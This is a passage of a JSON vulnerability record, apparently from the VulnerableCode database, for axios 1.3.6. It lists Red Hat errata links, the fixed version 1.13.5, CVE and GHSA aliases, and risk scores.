026:13548","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13548"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:2694","reference_id":"RHSA-2026:2694","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:2694"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3087","reference_id":"RHSA-2026:3087","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3087"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3105","reference_id":"RHSA-2026:3105","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3105"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3106","reference_id":"RHSA-2026:3106","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3106"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3107","reference_id":"RHSA-2026:3107","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3107"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3109","reference_id":"RHSA-2026:3109","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3109"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:4942","reference_id":"RHSA-2026:4942","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:4942"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5142","reference_id":"RHSA-2026:5142","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5142"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5168","reference_id":"RHSA-2026:5168","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5168"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5174","reference_id":"RHSA-2026:5174","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5174"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5636","reference_id":"RHSA-2026:5636","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5636"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5665","reference_id":"RHSA-2026:5665","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5665"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5807","reference_id":"RHSA-2026:5807","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5807"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6170","reference_id":"RHSA-2026:6170","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6170"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6174","reference_id":"RHSA-2026:6174","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6174"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6192","reference_id":"RHSA-2026:6192","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6192"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6277","reference_id":"RHSA-2026:6277","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6277"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6308","reference_id":"RHSA-2026:6308","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6308"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6309","reference_id":"RHSA-2026:6309","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6309"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6404","reference_id":"RHSA-2026:6404","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6404"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6428","reference_id":"RHSA-2026:6428","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6428"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6497","reference_id":"RHSA-2026:6497","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6497"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6567","reference_id":"RHSA-2026:6567","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6567"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6568","reference_id":"RHSA-2026:6568","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6568"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6802","reference_id":"RHSA-2026:6802","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6802"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7249","reference_id":"RHSA-2026:7249","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7249"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8218","reference_id":"RHSA-2026:8218","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8218"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8229","reference_id":"RHSA-2026:8229","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8229"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8499","reference_id":"RHSA-2026:8499","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8499"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8500","reference_id":"RHSA-2026:8500","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8500"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8501","reference_id":"RHSA-2026:8501","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8501"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9848","reference_id":"RHSA-2026:9848","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9848"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/62853?format=json","purl":"pkg:npm/axios@1.13.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.5"}],"aliases":["CVE-2026-25639","GHSA-43fc-jf86-j433"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x41s-g5mh-pkdq"}],"fixing_vulnerabilities":[],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.3.6"}